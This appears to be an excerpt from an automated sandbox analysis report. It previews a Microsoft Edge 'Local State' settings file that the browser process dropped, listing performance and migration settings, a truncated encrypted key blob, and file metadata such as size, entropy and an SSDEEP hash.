                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACfJtKmBjOatQCTdGyHFgDW8nDJ1h65xGLuMZaXVuWXwQAAAAA

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF247dc.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                Entropy (8bit):5.7944174570897875
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfxHQBYx5ih/cI9URLl8Roto+MFVvlwhse4IbONIeTC6XQS0qGqk+Z4uj+rE:akJHQveiRUxhc6qRAq1k8SPxVLZ7VTi3</